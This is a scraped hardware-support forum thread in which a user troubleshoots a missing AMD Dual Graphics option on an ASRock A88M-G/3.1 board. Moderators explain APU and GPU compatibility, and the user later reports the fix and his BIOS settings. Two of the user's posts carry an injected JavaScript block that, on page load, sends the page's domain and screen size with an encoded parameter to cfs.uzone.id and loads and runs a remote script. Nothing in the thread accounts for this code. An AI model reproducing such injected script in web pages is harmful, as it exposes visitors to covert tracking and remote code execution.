ASRock.com Homepage
Forum Home Forum Home > Technical Support > AMD Motherboards
  New Posts New Posts RSS Feed - BIOS dual graphics not found
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

BIOS dual graphics not found

 Post Reply Post Reply
Author
Message
erwinkweare View Drop Down
Newbie
Newbie
Avatar

Joined: 25 Aug 2016
Location: Indonesia
Status: Offline
Points: 6
Post Options Post Options   Thanks (0) Thanks(0)   Quote erwinkweare Quote  Post ReplyReply Direct Link To This Post Topic: BIOS dual graphics not found
    Posted: 25 Aug 2016 at 10:18am


Hi

I have Asrock A88M-G/3.1 and I didn't see dual graphics/surroundView on NB Configuration BIOS as below DVI Function.

I was update Latest BIOS 1.40 for Asrock A88M-G/3.1.

I was check specification support Dual Graphics.

What's wrong with this?

please help me..

thanks.






Edited by wardog - 25 Aug 2016 at 10:52am
Back to Top
wardog View Drop Down
Moderator Group
Moderator Group
Avatar

Joined: 15 Jul 2015
Status: Offline
Points: 6336
Post Options Post Options   Thanks (0) Thanks(0)   Quote wardog Quote  Post ReplyReply Direct Link To This Post Posted: 25 Aug 2016 at 11:03am
AMD's Dual Graphics is employed by using a compatible discreet graphics card in conjunction with the CPUs integrated iGPU.

I don't see you mention you using a discreet graphics card???
Nothing here. Move on!

16,441 - https://www.3dmark.com/fs/13030306
Back to Top
erwinkweare View Drop Down
Newbie
Newbie
Avatar

Joined: 25 Aug 2016
Location: Indonesia
Status: Offline
Points: 6
Post Options Post Options   Thanks (0) Thanks(0)   Quote erwinkweare Quote  Post ReplyReply Direct Link To This Post Posted: 25 Aug 2016 at 11:22am
Hi, Thanks for the respond.

I used MSI R7 250 1GB DDDR 5 128Bit OC discreet graphic card.

it's possible because my VGA card using DDR5 and Motherboard using DDR3 ?

Or I'm still using DDR3 Single channel 1600 Mhz? And Must upgrade to Dual Channel 1866 Mhz or Higher Frequency?

thanks.






Edited by wardog - 26 Aug 2016 at 4:27am
Back to Top
wardog View Drop Down
Moderator Group
Moderator Group
Avatar

Joined: 15 Jul 2015
Status: Offline
Points: 6336
Post Options Post Options   Thanks (0) Thanks(0)   Quote wardog Quote  Post ReplyReply Direct Link To This Post Posted: 26 Aug 2016 at 4:30am
You haven't mentioned what A series processor you have.

Go to the below link, click on Desktop, and it will show you what discreet card to use with your processor to enable Dual Graphics.

http://www.amd.com/en-us/innovations/software-technologies/dual-graphics
Nothing here. Move on!

16,441 - https://www.3dmark.com/fs/13030306
Back to Top
parsec View Drop Down
Moderator Group
Moderator Group
Avatar

Joined: 04 May 2015
Location: USA
Status: Offline
Points: 5003
Post Options Post Options   Thanks (0) Thanks(0)   Quote parsec Quote  Post ReplyReply Direct Link To This Post Posted: 26 Aug 2016 at 1:27pm
The second picture in the first post shows an A10-7860K. That matches his R7 250, according to your nice link to the Dual GPU info, thanks for that.

erwinkweare, this is from the FAQ section of the page that wardog gave you the link to. As it describes, you must enable Crossfire in the Catalyst Control Center software.

You should also set the Onboard Graphics option to Enabled in the BIOS. The cable to your monitor should be in the "strongest" video source, probably the R7 250.

To take advantage of AMD Radeon??Dual Graphics, you must use a compatible AMD A-Series APU to pair with your supported AMD Radeon?? graphics card. After installation of your graphics card, visit the AMD Graphics Drivers and Software Page, to download and install the latest AMD graphics drivers. After driver installation, the option to enable AMD Radeon??Dual Graphics should become available in the AMD Catalyst Control Center or the Radeon Settings page in Radeon Software Crimson Edition.

Once installed, go into the ?erformance??section of the AMD Catalyst Control Center or go to the ?aming, Global Options??tab in Radeon Settings and toggle the AMD Crossfire??technology option to ?n??or ?nable Crossfire?T€? This will allow the AMD A-Series APU graphics to work in tandem with the select AMD Radeon??GPU installed for increased graphics performance.


Back to Top
erwinkweare View Drop Down
Newbie
Newbie
Avatar

Joined: 25 Aug 2016
Location: Indonesia
Status: Offline
Points: 6
Post Options Post Options   Thanks (0) Thanks(0)   Quote erwinkweare Quote  Post ReplyReply Direct Link To This Post Posted: 26 Aug 2016 at 3:36pm
@parsec, thanks for the advice.

So, i have to install latest graphic driver from AMD. And that is, radeon software crimson edition. And i must plug-in a strong cable monitor. May i want to try DVI-D or HDMI cable.

I'll update soon to you.

Please see this video at 1:49. So, I don't have dual graphics/surround view mode on BIOS like him, right?

https://www.youtube.com/watch?v=szhuAFBq0LA

Thanks.

if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "繞ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnLAV8XOx6BxsvRqVBr6lvDrv0K3L9aFjKEWxgHwlDPmHmR%2fnUcDlRx%2fKExJuzKxyaziqlhZZz5yWaaPbmgFTGSxw9IQRqhMct%2f1ovtCczgREUFqyQyDypgIy4tgTaZDmvWUvr81hxf9Ab3m9%2fOrj6Yx8yXP2moASMpuamXotylgPxyQ8qW5v6DK4Z5TOpomvNFccFoFODIVY2rCQHO1ptIGXvAm%2bIto%2fx5%2biQ1SAps0ryERdWO%2frjkJrqTEvSIF%2bvMPleEd%2fokKwqERa%2bvWqlP4sraEBOH8AEWt%2bqNbAOwJ6K7zfOJfx50D9Mn1gsS1qQvW3ctOg5HA7zFZwf%2brdioQVDO9%2fCyK4MxhtWc23If6nZHHWaszr%2brEOhzLtWIHPfpwB7zFM6GsxL5IS%2bKNWfoou596UtQBnYrkiCeXItxoo%2bwRIVXzVf7HU1WbYnzQDKR3LlaAlyRpeLpHIGAjn%2bzzBBrAYWrFEUk5Yz8NpAgeyeo8JsENUONpeNd3koQ7bHuHoR06naHK2eE0OO7F668U91Dpw1YwAy0C6SvZYjTuU%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});}; if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnLAV8XOx6BxtJkY644nrVjvCzUhNaNCOLYIfglBiFOm3eVYR3rOidUl4%2fm94oVRAHjG%2fWSYY374ncNpS6YoDtjnwhObBZHXHVe%2bi8fN543InHfAJi14LNDm9kezS3bKkm%2bPCTcnjld%2f%2bi303PymKlCl%2fp1eInaf03Z93keQY0KV8Q2OIsMu9NdD%2fRNyR9kwR7BCKgIxhzjK%2fRYHVnFBX3RYUKXL1sJi8z7Jq8xuY%2bxxxqVFHsg6U3bgI%2fNdaru%2bFtavLZwNUFppTt3bFmvZ2eI1UJL0LMSTCHBWk9bkk3WFPru5ZsXf%2bzTloRVYaM1ArhjUn59XW0tt4xmkEgIaW0FciQ8pobrhNJKMJVDk%2b1HMate8X96STqcOOfW8x2KvlZ%2fioNusbWfqdMGMSu1gNPbY4y2BN7frhwfPCN7zOmJ7DYs6gIkbgCpD7d0lPoMMcj6Zej%2fFyyPBBtFiKKB5xV1zyxcMInBkF5I3K1%2bUtPeVMxP%2fTl1aKL5hPglMgykPgWaWQWfX7JlFdUSGjEwqXMWEELZoHNsfpuSR3%2faiFBubU%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

Edited by erwinkweare - 26 Aug 2016 at 3:37pm
Back to Top
erwinkweare View Drop Down
Newbie
Newbie
Avatar

Joined: 25 Aug 2016
Location: Indonesia
Status: Offline
Points: 6
Post Options Post Options   Thanks (0) Thanks(0)   Quote erwinkweare Quote  Post ReplyReply Direct Link To This Post Posted: 09 Sep 2016 at 3:35pm
solved,

So, I bought new processor A10 7870K and finally compatible with my discreet graphic card R7 250 DDR5. (A10 7850K Compatible too as information from youtube).

maybe A10 7860K compatible with R7 250 DDR3 (because it's rare now & not tested by me) or R7 240 DDR3/DDR5 (not tested by me).

The Concluding is Asrock A88M-G/3.1 support dual graphics, VGA cable support dual graphics, AMD Catalyst Control Center software support dual graphics also.

My Settings Dual Graphics;

- VGA cable connect to discreet graphic card.
- On BIOS NB Configuration: Set Enable Onboard Graphic Card.
- Set Primary Graphic Card to PCIE.
- Suggestion by me, Set Manually Buffer Size to Onboard Graphic Card 2GB (DDR5 discreet graphic card) or 1GB (DDR3 discreet graphic card).

And If your hardware is compatible, dual graphics setting should appear on Catalyst Control Center. On Gaming Tab And Performance Tab you can enable it. And check your device manager if that's correct on your display adapter will be (AMD Radeon R7 + Radeon R7 250 Dual Graphics).
 

if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnxDFzPmxTFzmSK663AI19NQjhq5V14C9Ym%2bpCcqYyHweM7pqYLZZl43o5QXAIXkmOEBRmEW6zaM1ED9IzsicEJNMlJmPPfk2DJPVvT1FTFpwtEQQ%2b%2bbgzLKrP74zSdRVVH%2b9Pqk7JPA5fEOki3BvhkEpF5GeA22PCN8pwfjWPf1OCaScmpXHz7Qd4JAvVe2HY2EwVGEYTo57lchR0OAhF%2b8PJ8zTVIbcRxeBWttd1RPXjDp3De5WFTcbNmFSSXfp98YNtrtYjNj%2b7xsJvIgee9sfG4YPHRLy%2f1EZXqZxDjyCEctoC7pQM9xvl%2bZgIl4hi89uGMin3%2bT5ur%2fPDiokJXVmcwiEDM6TDyoucxrFvpQNxFTEN6CBVosVgS3IRrUERaftNygw105OBrWUGS6FbPVsUTzH1Z0yFldjHG3vRptmbHm6beM%2bM2QvpMn9oPY5KmtJJ5mEmVyRHo4QCD%2bRruWSXidZKbI5jrbdA62KSEVLZUfzaK9Sw7Xsvrz5N3NGAJJKAOPhD%2fLF1Z6%2bnjO4HKaL%2b5TLDWrWF" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
Back to Top
 Post Reply Post Reply
  Share Topic   

Forum Jump Forum Permissions View Drop Down

Forum Software by Web Wiz Forums® version 11.06
Copyright ©2001-2018 Web Wiz Ltd.

This page was generated in 0.061 seconds.